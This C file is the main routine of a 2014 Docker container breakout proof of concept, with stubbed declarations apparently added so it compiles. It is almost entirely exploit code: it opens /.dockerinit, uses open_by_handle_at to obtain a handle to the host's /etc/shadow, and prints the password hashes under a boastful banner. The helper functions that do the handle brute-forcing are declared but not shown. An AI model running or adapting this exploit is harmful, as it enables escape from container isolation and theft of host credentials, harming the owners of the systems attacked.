
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct my_file_handle {int handle_bytes; int handle_type; int f_handle; } ;
struct file_handle {int dummy; } ;
typedef int buf ;


 int O_RDONLY ;
 int close (int) ;
 int die (char*) ;
 int dump_handle (struct my_file_handle*) ;
 scalar_t__ find_handle (int,char*,struct my_file_handle*,struct my_file_handle*) ;
 int fprintf (int ,char*,...) ;
 int memset (char*,int ,int) ;
 int open (char*,int ) ;
 int open_by_handle_at (int,struct file_handle*,int ) ;
 scalar_t__ read (int,char*,int) ;
 int stderr ;

int main()
{
    char buf[0x1000];
    int fd1, fd2;
    struct my_file_handle h;
    struct my_file_handle root_h = {
        .handle_bytes = 8,
        .handle_type = 1,
        .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
    };

    fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014             [***]\n"
           "[***] The tea from the 90's kicks your sekurity again.     [***]\n"
           "[***] If you have pending sec consulting, I'll happily     [***]\n"
           "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");

    read(0, buf, 1);


    if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
        die("[-] open");

    if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
        die("[-] Cannot find valid handle!");

    fprintf(stderr, "[!] Got a final handle!\n");
    dump_handle(&h);

    if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
        die("[-] open_by_handle");

    memset(buf, 0, sizeof(buf));
    if (read(fd2, buf, sizeof(buf) - 1) < 0)
        die("[-] read");

    fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);

    close(fd2); close(fd1);

    return 0;
}
